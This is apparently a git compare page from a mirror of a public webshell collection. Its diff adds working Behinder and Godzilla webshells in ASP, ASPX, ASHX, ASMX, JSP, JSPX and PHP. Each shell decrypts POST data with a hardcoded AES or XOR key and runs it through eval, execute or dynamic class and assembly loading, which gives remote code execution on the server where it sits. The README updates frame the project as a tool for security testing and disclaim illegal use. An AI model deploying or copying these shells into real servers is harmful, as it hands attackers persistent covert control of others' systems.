mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
Compare commits
11 Commits
2020-04-04
...
2020-08-18
| Author | SHA1 | Date | |
|---|---|---|---|
|
6d94915e68 | ||
|
|
245ef6f2a3 | ||
|
|
9b50a0cb22 | ||
|
|
05e2ea5d89 | ||
|
|
088645f1c2 | ||
|
|
9fecf1510f | ||
|
|
5cf91ed642 | ||
|
|
06c384c1a9 | ||
|
|
6b17b55fdb | ||
|
|
5e745b5c63 | ||
|
|
344a691508 |
11
Behinder/shell.asp
Normal file
11
Behinder/shell.asp
Normal file
@@ -0,0 +1,11 @@
|
||||
<%
|
||||
Response.CharSet = "UTF-8"
|
||||
Session("k")=k
|
||||
k=Session("k")
|
||||
size=Request.TotalBytes
|
||||
content=Request.BinaryRead(size)
|
||||
For i=1 To size
|
||||
result=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))
|
||||
Next
|
||||
execute(result)
|
||||
%>
|
||||
1
Behinder/shell.aspx
Normal file
1
Behinder/shell.aspx
Normal file
@@ -0,0 +1 @@
|
||||
<%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b"); Response.Write(Session[0]); return;}byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
|
||||
1
Behinder/shell.jsp
Normal file
1
Behinder/shell.jsp
Normal file
@@ -0,0 +1 @@
|
||||
AAAAA<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>bbbb
|
||||
29
Behinder/shell.php
Normal file
29
Behinder/shell.php
Normal file
@@ -0,0 +1,29 @@
|
||||
<?php
|
||||
@error_reporting(0);
|
||||
session_start();
|
||||
|
||||
if ($_SERVER['REQUEST_METHOD'] === 'POST')
|
||||
{
|
||||
$key="e45e329feb5d925b";
|
||||
$_SESSION['k']=$key;
|
||||
$post=file_get_contents("php://input");
|
||||
if(!extension_loaded('openssl'))
|
||||
{
|
||||
$t="base64_"."decode";
|
||||
$post=$t($post."");
|
||||
|
||||
for($i=0;$i<strlen($post);$i++) {
|
||||
$post[$i] = $post[$i]^$key[$i+1&15];
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
$post=openssl_decrypt($post, "AES128", $key);
|
||||
}
|
||||
$arr=explode('|',$post);
|
||||
$func=$arr[0];
|
||||
$params=$arr[1];
|
||||
class C{public function __invoke($p) {eval($p."");}}
|
||||
@call_user_func(new C(),$params);
|
||||
}
|
||||
?>
|
||||
17
Godzilla/123.ashx
Normal file
17
Godzilla/123.ashx
Normal file
@@ -0,0 +1,17 @@
|
||||
<%@ Language="C#" Class="Handler1" %>
|
||||
public class Handler1 : System.Web.IHttpHandler,System.Web.SessionState.IRequiresSessionState
|
||||
{
|
||||
|
||||
public void ProcessRequest(System.Web.HttpContext Context)
|
||||
{
|
||||
try{string key = "202cb962ac59075b";string pass = "123";string md5 = System.BitConverter.ToString(new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.Default.GetBytes(pass + key))).Replace("-", "");byte[] data = System.Convert.FromBase64String(Context.Request[pass]);data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(data, 0, data.Length);if (Context.Session["payload"] == null){ Context.Session["payload"] = (System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod("Load", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data }); ;}else{ object o = ((System.Reflection.Assembly)Context.Session["payload"]).CreateInstance("LY"); o.Equals(Context); o.Equals(data); byte[] r = System.Convert.FromBase64String(o.ToString()); Context.Response.Write(md5.Substring(0, 16)); Context.Response.Write(System.Convert.ToBase64String(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length))); Context.Response.Write(md5.Substring(16));}}catch(System.Exception){}
|
||||
}
|
||||
|
||||
public bool IsReusable
|
||||
{
|
||||
get
|
||||
{
|
||||
return false;
|
||||
}
|
||||
}
|
||||
}
|
||||
14
Godzilla/123.asmx
Normal file
14
Godzilla/123.asmx
Normal file
@@ -0,0 +1,14 @@
|
||||
<%@ WebService Language="C#" Class="WebService1" %>
|
||||
public class WebService1 : System.Web.Services.WebService
|
||||
{
|
||||
public WebService1() {
|
||||
try{string key = "202cb962ac59075b";string pass = "123";string md5 = System.BitConverter.ToString(new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.Default.GetBytes(pass + key))).Replace("-", "");byte[] data = System.Convert.FromBase64String(Context.Request[pass]);data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(data, 0, data.Length);if (Context.Session["payload"] == null){ Context.Session["payload"] = (System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod("Load", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data }); ;}else{ object o = ((System.Reflection.Assembly)Context.Session["payload"]).CreateInstance("LY"); o.Equals(Context); o.Equals(data); byte[] r = System.Convert.FromBase64String(o.ToString()); Context.Response.Write(md5.Substring(0, 16)); Context.Response.Write(System.Convert.ToBase64String(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length))); Context.Response.Write(md5.Substring(16));}}catch(System.Exception){}
|
||||
}
|
||||
|
||||
[System.Web.Services.WebMethod(EnableSession = true)]
|
||||
public void Test()
|
||||
{
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
1
Godzilla/123.aspx
Normal file
1
Godzilla/123.aspx
Normal file
@@ -0,0 +1 @@
|
||||
<%@ Page Language="C#"%><%try{string key = "202cb962ac59075b";string pass = "123";string md5 = System.BitConverter.ToString(new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.Default.GetBytes(pass + key))).Replace("-", "");byte[] data = System.Convert.FromBase64String(Context.Request[pass]);data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(data, 0, data.Length);if (Context.Session["payload"] == null){ Context.Session["payload"] = (System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod("Load", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data }); ;}else{ object o = ((System.Reflection.Assembly)Context.Session["payload"]).CreateInstance("LY"); o.Equals(Context); o.Equals(data); byte[] r = System.Convert.FromBase64String(o.ToString()); Context.Response.Write(md5.Substring(0, 16)); Context.Response.Write(System.Convert.ToBase64String(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length))); Context.Response.Write(md5.Substring(16));}}catch(System.Exception){}%>
|
||||
1
Godzilla/123.jsp
Normal file
1
Godzilla/123.jsp
Normal file
@@ -0,0 +1 @@
|
||||
<%! String xc="202cb962ac59075b"; String pass="123"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs }); value = value.replace("\n", "").replace("\r", "");} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><% try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(pageContext.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", new String(data));Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(pageContext);response.getWriter().write(md5.substring(0,16));response.getWriter().write(base64Encode(x(base64Decode(f.toString()), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}%>
|
||||
1
Godzilla/123.jspx
Normal file
1
Godzilla/123.jspx
Normal file
@@ -0,0 +1 @@
|
||||
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2"><jsp:declaration> String xc="202cb962ac59075b"; String pass="123"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs }); value = value.replace("\n", "").replace("\r", "");} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }</jsp:declaration><jsp:scriptlet> try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(pageContext.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", new String(data));Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(pageContext);response.getWriter().write(md5.substring(0,16));response.getWriter().write(base64Encode(x(base64Decode(f.toString()), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}</jsp:scriptlet></jsp:root>
|
||||
34
Godzilla/123.php
Normal file
34
Godzilla/123.php
Normal file
@@ -0,0 +1,34 @@
|
||||
<?php
|
||||
session_start();
|
||||
@set_time_limit(0);
|
||||
@error_reporting(0);
|
||||
function E($D,$K){
|
||||
for($i=0;$i<strlen($D);$i++) {
|
||||
$D[$i] = $D[$i]^$K[$i+1&15];
|
||||
}
|
||||
return $D;
|
||||
}
|
||||
function Q($D){
|
||||
return base64_encode($D);
|
||||
}
|
||||
function O($D){
|
||||
return base64_decode($D);
|
||||
}
|
||||
$P='123';
|
||||
$V='payload';
|
||||
$T='202cb962ac59075b';
|
||||
if (isset($_POST[$P])){
|
||||
$F=O(E(O($_POST[$P]),$T));
|
||||
if (isset($_SESSION[$V])){
|
||||
$L=$_SESSION[$V];
|
||||
$A=explode('|',$L);
|
||||
class C{public function nvoke($p) {eval($p."");}}
|
||||
$R=new C();
|
||||
$R->nvoke($A[0]);
|
||||
echo substr(md5($P.$T),0,16);
|
||||
echo Q(E(@run($F),$T));
|
||||
echo substr(md5($P.$T),16);
|
||||
}else{
|
||||
$_SESSION[$V]=$F;
|
||||
}
|
||||
}
|
||||
@@ -62,4 +62,4 @@ Check github releases. Latest:
|
||||
|
||||
[https://github.com/tennc/webshell/releases](https://github.com/tennc/webshell/releases)
|
||||
|
||||
## <img src="https://raw.githubusercontent.com/tennc/webshell/master/jetbrains.png" width="400"> Thans to [Jetbrains](https://www.jetbrains.com/?from=webshell)
|
||||
## <img src="https://raw.githubusercontent.com/tennc/webshell/master/jetbrains.png" width="400"> Thanks to [Jetbrains](https://www.jetbrains.com/?from=webshell)
|
||||
|
||||
@@ -1,4 +1,27 @@
|
||||
### webshell
|
||||
This is a webshell open source project
|
||||
### [webshell](https://github.com/tennc/webshell/)
|
||||
|
||||
This project can help security personnel to check their own websites, as well as some security tests on network firewalls...
|
||||
|
||||
### webshell
|
||||
|
||||
- Give roses, I have a handful of fragrance, if you download this project, please also submit a shell
|
||||
|
||||
- This project covers various common scripts
|
||||
|
||||
- Such as: asp, aspx, php, jsp, pl, py
|
||||
|
||||
- If submitting various webshells, please do not change the name and password
|
||||
|
||||
- Note: All shells do not guarantee whether there is a backdoor, but they will never intentionally add a backdoor
|
||||
|
||||
- Please submit, please do not add a back door
|
||||
|
||||
- If you find a backdoor code, please issue.
|
||||
|
||||
- The tools provided by this project are prohibited from engaging in illegal activities. This project is for testing only, and all consequences caused by it are irrelevant to me.
|
||||
|
||||
#### [releases](https://github.com/tennc/webshell/releases)
|
||||
|
||||
### [last download](https://github.com/tennc/webshell/releases/latest)
|
||||
|
||||
|
||||
|
||||
Reference in New Issue
Block a user